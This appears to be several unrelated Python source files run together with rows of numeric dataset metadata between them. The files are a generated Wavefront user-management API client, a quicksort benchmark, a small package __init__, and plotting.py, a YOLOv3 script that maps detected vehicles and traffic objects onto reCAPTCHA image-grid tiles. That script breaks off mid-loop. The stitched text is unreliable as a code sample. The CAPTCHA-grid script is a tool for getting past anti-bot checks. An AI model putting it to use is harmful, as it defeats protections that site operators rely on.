def revoke_permission_from_users(self, permission, **kwargs): # noqa: E501
"""Revokes a specific permission from multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.revoke_permission_from_users(permission, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str permission: Permission to revoke from the accounts. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission (required)
:param list[str] body: List of users or service accounts from which the specified permission should be revoked
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.revoke_permission_from_users_with_http_info(permission, **kwargs) # noqa: E501
else:
(data) = self.revoke_permission_from_users_with_http_info(permission, **kwargs) # noqa: E501
return data
def revoke_permission_from_users_with_http_info(self, permission, **kwargs): # noqa: E501
"""Revokes a specific permission from multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.revoke_permission_from_users_with_http_info(permission, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str permission: Permission to revoke from the accounts. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission (required)
:param list[str] body: List of users or service accounts from which the specified permission should be revoked
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['permission', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method revoke_permission_from_users" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'permission' is set
if self.api_client.client_side_validation and ('permission' not in params or
params['permission'] is None): # noqa: E501
raise ValueError("Missing the required parameter `permission` when calling `revoke_permission_from_users`") # noqa: E501
collection_formats = {}
path_params = {}
if 'permission' in params:
path_params['permission'] = params['permission'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/revoke/{permission}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def revoke_user_permission(self, id, **kwargs): # noqa: E501
"""Revokes a specific permission from user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.revoke_user_permission(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param str group:
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.revoke_user_permission_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.revoke_user_permission_with_http_info(id, **kwargs) # noqa: E501
return data
def revoke_user_permission_with_http_info(self, id, **kwargs): # noqa: E501
"""Revokes a specific permission from user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.revoke_user_permission_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param str group:
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'group'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method revoke_user_permission" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `revoke_user_permission`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'group' in params:
form_params.append(('group', params['group'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}/revoke', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_user(self, id, **kwargs): # noqa: E501
"""Update user with given user groups, permissions and ingestion policy. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param UserRequestDTO body: Example Body: <pre>{ \"identifier\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] }</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_user_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.update_user_with_http_info(id, **kwargs) # noqa: E501
return data
def update_user_with_http_info(self, id, **kwargs): # noqa: E501
"""Update user with given user groups, permissions and ingestion policy. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param UserRequestDTO body: Example Body: <pre>{ \"identifier\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] }</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `update_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def validate_users(self, **kwargs): # noqa: E501
"""Returns valid users and service accounts, also invalid identifiers from the given list # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] body:
:return: ResponseContainerValidatedUsersDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.validate_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.validate_users_with_http_info(**kwargs) # noqa: E501
return data
def validate_users_with_http_info(self, **kwargs): # noqa: E501
"""Returns valid users and service accounts, also invalid identifiers from the given list # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_users_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] body:
:return: ResponseContainerValidatedUsersDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method validate_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/validateUsers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerValidatedUsersDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
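# --- Hypothetical usage sketch (not part of the generated file): illustrates
# the calling pattern described in the docstrings above. The host URL and
# token are placeholders, and Configuration is assumed to live in the same
# swagger-generated package alongside ApiClient.
if __name__ == '__main__':
    from wavefront_api_client.configuration import Configuration
    config = Configuration()
    config.host = 'https://YOUR_INSTANCE.wavefront.com'
    config.api_key['X-AUTH-TOKEN'] = '<<API-TOKEN>>'
    config.api_key_prefix['X-AUTH-TOKEN'] = 'Bearer'
    user_api = UserApi(ApiClient(configuration=config))
    user = user_api.get_user('user@example.com')                   # synchronous
    thread = user_api.get_user('user@example.com', async_req=True)
    user = thread.get()                                            # asynchronous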
| 40.154101
| 409
| 0.599196
| 6,928
| 60,713
| 5.01097
| 0.038539
| 0.054384
| 0.024196
| 0.03111
| 0.965981
| 0.961977
| 0.960393
| 0.954171
| 0.951089
| 0.945241
| 0
| 0.020326
| 0.306359
| 60,713
| 1,511
| 410
| 40.180675
| 0.804027
| 0.349085
| 0
| 0.837037
| 0
| 0
| 0.167362
| 0.048631
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038272
| false
| 0
| 0.004938
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d26d9c4a809fe7cebec535a3000886981482ce5a
| 3,041
|
py
|
Python
|
src/quicksort.py
|
endere/Data-structures
|
2eb522406c348b6ca26c47f8790b77088cc8cae5
|
[
"MIT"
] | 1
|
2017-06-19T22:35:34.000Z
|
2017-06-19T22:35:34.000Z
|
src/quicksort.py
|
endere/Data-structures
|
2eb522406c348b6ca26c47f8790b77088cc8cae5
|
[
"MIT"
] | 1
|
2017-07-13T00:53:06.000Z
|
2017-07-13T00:53:06.000Z
|
src/quicksort.py
|
endere/Data-structures-2nd-half
|
2eb522406c348b6ca26c47f8790b77088cc8cae5
|
[
"MIT"
] | null | null | null |
"""Quick Sort Data Structure."""
def quick_sort(array):
"""."""
if len(array) == 1:
if not isinstance(array[0], int):
raise TypeError('Must be an integer, please try again.')
return array
if len(array) == 0:
return array
pivot_point = array[0]
stored_index = 0
for i in range(len(array)):
if not isinstance(array[i], int):
raise TypeError('Must be an integer, please try again.')
if pivot_point > array[i]:
stored_index += 1
array[stored_index], array[i] = array[i], array[stored_index]
array[stored_index], array[0] = array[0], array[stored_index]
return quick_sort(array[:stored_index]) + [array[stored_index]] + quick_sort(array[stored_index + 1:])
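# A quick worked example of quick_sort (hedged; not part of the original file):
# >>> quick_sort([5, 3, 1, 4, 2])
# [1, 2, 3, 4, 5]
# >>> quick_sort(['a'])
# TypeError: Must be an integer, please try again.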
if __name__ == '__main__':  # pragma: no cover
import random
import datetime
from functools import reduce
times = []
num_runs = 500
string_length = 5
for i in range(num_runs):
data = random.sample(range(string_length), string_length)
timeA = datetime.datetime.now()
quick_sort(data)
timeB = datetime.datetime.now()
times.append(timeB - timeA)
average_time = reduce(lambda x, y: x + y, times) / len(times)
print(' ')
    print('Average Case: Shuffled')
print('Number of runs: ', num_runs)
print('Length of lists to sort: ', string_length)
print('Average time: ', str(average_time)[-8:], 'seconds')
    times = []
    string_length = 100
for i in range(num_runs):
data = random.sample(range(string_length), string_length)
timeA = datetime.datetime.now()
quick_sort(data)
timeB = datetime.datetime.now()
times.append(timeB - timeA)
average_time = reduce(lambda x, y: x + y, times) / len(times)
print(' ')
    print('Average Case: Shuffled')
print('Number of runs: ', num_runs)
print('Length of lists to sort: ', string_length)
print('Average time: ', str(average_time)[-8:], 'seconds')
    times = []
    string_length = 5
for i in range(num_runs):
data = [i for i in range(string_length)][::-1]
timeA = datetime.datetime.now()
quick_sort(data)
timeB = datetime.datetime.now()
times.append(timeB - timeA)
average_time = reduce(lambda x, y: x + y, times) / len(times)
print(' ')
print('Worst Case: Reverse order')
print('Number of runs: ', num_runs)
print('Length of lists to sort: ', string_length)
print('Average time: ', str(average_time)[-8:], 'seconds')
    times = []
    string_length = 100
for i in range(num_runs):
data = [i for i in range(string_length)][::-1]
timeA = datetime.datetime.now()
quick_sort(data)
timeB = datetime.datetime.now()
times.append(timeB - timeA)
average_time = reduce(lambda x, y: x + y, times) / len(times)
print(' ')
print('Worst Case: Reverse order')
print('Number of runs: ', num_runs)
print('Length of lists to sort: ', string_length)
print('Average time: ', str(average_time)[-8:], 'seconds')
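# A hedged alternative to the datetime-based timing above, using the
# standard-library timeit (a sketch, not part of the original file; it only
# assumes quick_sort from this module):
import random
import timeit

def average_sort_time(n, runs=500):
    """Mean quick_sort runtime in seconds over `runs` fresh shuffled lists of length n."""
    total = 0.0
    for _ in range(runs):
        data = random.sample(range(n), n)  # fresh input for every run
        total += timeit.timeit(lambda: quick_sort(data), number=1)
    return total / runs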
| 37.085366 | 106 | 0.615258 | 408 | 3,041 | 4.446078 | 0.181373 | 0.092613 | 0.083793 | 0.042448 | 0.804851 | 0.786108 | 0.750827 | 0.750827 | 0.750827 | 0.750827 | 0 | 0.011384 | 0.248931 | 3,041 | 81 | 107 | 37.54321 | 0.782837 | 0.014798 | 0 | 0.746667 | 0 | 0 | 0.141374 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013333 | false | 0 | 0.04 | 0 | 0.093333 | 0.266667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
| d273afb46d72bd26daa615f61ad7e7f3ef48d942 | 192 | py | Python | riglib/hdfwriter/__init__.py | DerekYJC/bmi_python | 7b9cf3f294a33688db24b0863c1035e9cc6999ea | ["Apache-2.0"] | null | null | null | riglib/hdfwriter/__init__.py | DerekYJC/bmi_python | 7b9cf3f294a33688db24b0863c1035e9cc6999ea | ["Apache-2.0"] | 12 | 2020-07-31T18:58:31.000Z | 2022-02-10T14:36:00.000Z | riglib/hdfwriter/__init__.py | DerekYJC/bmi_python | 7b9cf3f294a33688db24b0863c1035e9cc6999ea | ["Apache-2.0"] | 4 | 2020-03-06T15:39:00.000Z | 2021-05-26T17:03:21.000Z |
# This is the __init__.py to use when importing HDFWriter from within
# riglib directly, without setting hdfwriter up as its own package.
from .hdfwriter.hdfwriter import MsgTable
from .hdfwriter.hdfwriter import HDFWriter
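# A hedged usage note (not part of the original file): with the re-exports
# above, callers can write
#     from riglib.hdfwriter import HDFWriter, MsgTable
# instead of reaching into riglib.hdfwriter.hdfwriter directly.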
| 38.4 | 66 | 0.802083 | 29 | 192 | 5.172414 | 0.689655 | 0.173333 | 0.293333 | 0.373333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151042 | 192 | 4 | 67 | 48 | 0.920245 | 0.526042 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
| 9629bdc6dd6436a851d69554fbb7d3652b34ac09 | 26,472 | py | Python | plotting.py | brfkorucu/Gridding-Recaptcha-Photo | 8641ed44913a5cfed925fe1e4851a8310f7798db | ["MIT"] | 2 | 2021-11-07T16:30:22.000Z | 2022-03-11T16:44:34.000Z | plotting.py | brfkorucu/Gridding-Recaptcha-Photo | 8641ed44913a5cfed925fe1e4851a8310f7798db | ["MIT"] | 1 | 2022-03-11T16:54:55.000Z | 2022-03-11T18:05:21.000Z | plotting.py | brfkorucu/Gridding-Recaptcha-Photo | 8641ed44913a5cfed925fe1e4851a8310f7798db | ["MIT"] | null | null | null |
################################################################################################
import cv2
import numpy as np
import time
import sys
import os
import optparse
################################################################################################
parser = optparse.OptionParser("usage%prog " + "-p <name of jpg's>")
parser.add_option("-p", dest="path_name", type="str", help="specify jpg path")
options, args = parser.parse_args()
path_name = options.path_name
if path_name is None:
print(parser.usage)
exit(0)
################################################################################################
CONFIDENCE = 0.2
SCORE_THRESHOLD = 0.2
IOU_THRESHOLD = 0.2
config_path = "cfg/yolov3.cfg"
weights_path = "cfg/yolov3.weights"
labels = open("cfg/coco.names").read().strip().split("\n")
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
image = cv2.imread(path_name)
file_name = os.path.basename(path_name)
filename, ext = file_name.split(".")
h, w = image.shape[:2]
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
#print("image.shape:", image.shape)
#print("blob.shape:", blob.shape)
net.setInput(blob)
ln = net.getLayerNames()
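# note: on OpenCV >= 4.5.4 getUnconnectedOutLayers() returns a flat array and the
# next line would read ln[i - 1]; the i[0] form below assumes an older OpenCV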
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print(f"\nTime took: {time_took:.2f}s")
boxes, confidences, class_ids = [], [], []
for output in layer_outputs:
for detection in output:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > CONFIDENCE:
box = detection[:4] * np.array([w, h, w, h])
(centerX, centerY, width, height) = box.astype("int")
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
class_ids.append(class_id)
#print(detection.shape)
#print("\nObjects : ", boxes)
################################################################################################
if image.shape == (450, 450, 3):
print("\nİmage shape ", image.shape)
def box_path_x1(x1):
if x1 <= 112.5:
path_x1 = "G0"
return path_x1
if 112.5 < x1 <= 225:
path_x1 = "G1"
return path_x1
if 225 < x1 <= 337.5:
path_x1 = "G2"
return path_x1
if 337.5 < x1 <= 450:
path_x1 = "G3"
return path_x1
def box_path_x2(x2):
if x2 <= 112.5:
path_x2 = "G0"
return path_x2
if 112.5 < x2 <= 225:
path_x2 = "G1"
return path_x2
if 225 < x2 <= 337.5:
path_x2 = "G2"
return path_x2
if 337.5 < x2 <= 450:
path_x2 = "G3"
return path_x2
def box_path_y1(y1):
if y1 <= 112.5:
path_y1 = "G0"
return path_y1
if 112.5 < y1 <= 225:
path_y1 = "G4"
return path_y1
if 225 < y1 <= 337.5:
path_y1 = "G8"
return path_y1
if 337.5 < y1 <= 450:
path_y1 = "G12"
return path_y1
def box_path_y2(y2):
if y2 <= 112.5:
path_y2 = "G0"
return path_y2
if 112.5 < y2 <= 225:
path_y2 = "G4"
return path_y2
if 225 < y2 <= 337.5:
path_y2 = "G8"
return path_y2
if 337.5 < y2 <= 450:
path_y2 = "G12"
return path_y2
def box_corner(x,y):
if x == "G0" and y == "G0":
path = "G0"
return path
if x == "G0" and y == "G4":
path = "G4"
return path
if x == "G0" and y == "G8":
path = "G8"
return path
if x == "G0" and y == "G12":
path = "G12"
return path
if x == "G1" and y == "G0":
path = "G1"
return path
if x == "G1" and y == "G4":
path = "G5"
return path
if x == "G1" and y == "G8":
path = "G9"
return path
if x == "G1" and y == "G12":
path = "G13"
return path
if x == "G2" and y == "G0":
path = "G2"
return path
if x == "G2" and y == "G4":
path = "G6"
return path
if x == "G2" and y == "G8":
path = "G10"
return path
if x == "G2" and y == "G12":
path = "G14"
return path
if x == "G3" and y == "G0":
path = "G3"
return path
if x == "G3" and y == "G4":
path = "G7"
return path
if x == "G3" and y == "G8":
path = "G11"
return path
if x == "G3" and y == "G12":
path = "G15"
return path
box_bicycle = []
box_car = []
box_motorcycle = []
box_bus = []
box_boat = []
box_traffic_light = []
box_fire_hydrant = []
box_parking_meter = []
for a in range(len(boxes)):
x1 = boxes[a][0]
x1_box = box_path_x1(x1)
x2 = boxes[a][2] + x1
x2_box = box_path_x2(x2)
y1 = boxes[a][1]
y1_box = box_path_y1(y1)
y2 = boxes[a][3] + y1
y2_box = box_path_y2(y2)
x1y1 = box_corner(x=x1_box, y=y1_box)
x1y1_n = ""
for n in x1y1:
if n != "G":
x1y1_n += n
x2y1 = box_corner(x=x2_box, y=y1_box)
x2y1_n = ""
for n in x2y1:
if n != "G":
x2y1_n += n
x1y2 = box_corner(x=x1_box, y=y2_box)
x1y2_n = ""
for n in x1y2:
if n != "G":
x1y2_n += n
x2y2 = box_corner(x=x2_box, y=y2_box)
x2y2_n = ""
for n in x2y2:
if n != "G":
x2y2_n += n
x1y1_n = int(x1y1_n)
x2y1_n = int(x2y1_n)
x1y2_n = int(x1y2_n)
x2y2_n = int(x2y2_n)
if class_ids[a] == 1:
class_ids[a] = "Bicycle"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_bicycle:
box_bicycle.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_bicycle:
box_bicycle.append(click_box[i])
if class_ids[a] == 2:
class_ids[a] = "Car"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_car:
box_car.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_car:
box_car.append(click_box[i])
if class_ids[a] == 3:
class_ids[a] = "Motorcycle"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_motorcycle:
box_motorcycle.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_motorcycle:
box_motorcycle.append(click_box[i])
if class_ids[a] == 5:
class_ids[a] = "Bus"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_bus:
box_bus.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_bus:
box_bus.append(click_box[i])
if class_ids[a] == 8:
class_ids[a] = "Boat"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_boat:
box_boat.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_boat:
box_boat.append(click_box[i])
if class_ids[a] == 9:
class_ids[a] = "Traffic Light"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_traffic_light:
box_traffic_light.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_traffic_light:
box_traffic_light.append(click_box[i])
if class_ids[a] == 12:
class_ids[a] = "Parking meter"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_parking_meter:
box_parking_meter.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 4
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_parking_meter:
box_parking_meter.append(click_box[i])
################################################################################################
if image.shape == (300, 300, 3):
print("\nİmage shape ", image.shape)
def box_path_x1(x1):
if x1 <= 100:
path_x1 = "G0"
return path_x1
if 100 < x1 <= 200:
path_x1 = "G1"
return path_x1
if 200 < x1 <= 300:
path_x1 = "G2"
return path_x1
def box_path_x2(x2):
if x2 <= 100:
path_x2 = "G0"
return path_x2
if 100 < x2 <= 200:
path_x2 = "G1"
return path_x2
if 200 < x2 <= 300:
path_x2 = "G2"
return path_x2
def box_path_y1(y1):
if y1 <= 100:
path_y1 = "G0"
return path_y1
if 100 < y1 <= 200:
path_y1 = "G3"
return path_y1
if 200 < y1 <= 300:
path_y1 = "G6"
return path_y1
def box_path_y2(y2):
if y2 <= 100:
path_y2 = "G0"
return path_y2
if 100 < y2 <= 200:
path_y2 = "G3"
return path_y2
if 200 < y2 <= 300:
path_y2 = "G6"
return path_y2
def box_corner(x,y):
if x == "G0" and y == "G0":
path = "G0"
return path
if x == "G0" and y == "G3":
path = "G3"
return path
if x == "G0" and y == "G6":
path = "G6"
return path
if x == "G1" and y == "G0":
path = "G1"
return path
if x == "G1" and y == "G3":
path = "G4"
return path
if x == "G1" and y == "G6":
path = "G7"
return path
if x == "G2" and y == "G0":
path = "G2"
return path
if x == "G2" and y == "G3":
path = "G5"
return path
if x == "G2" and y == "G6":
path = "G8"
return path
box_bicycle = []
box_car = []
box_motorcycle = []
box_bus = []
box_boat = []
box_traffic_light = []
box_fire_hydrant = []
box_parking_meter = []
for a in range(len(boxes)):
x1 = boxes[a][0]
x1_box = box_path_x1(x1)
x2 = boxes[a][2] + x1
x2_box = box_path_x2(x2)
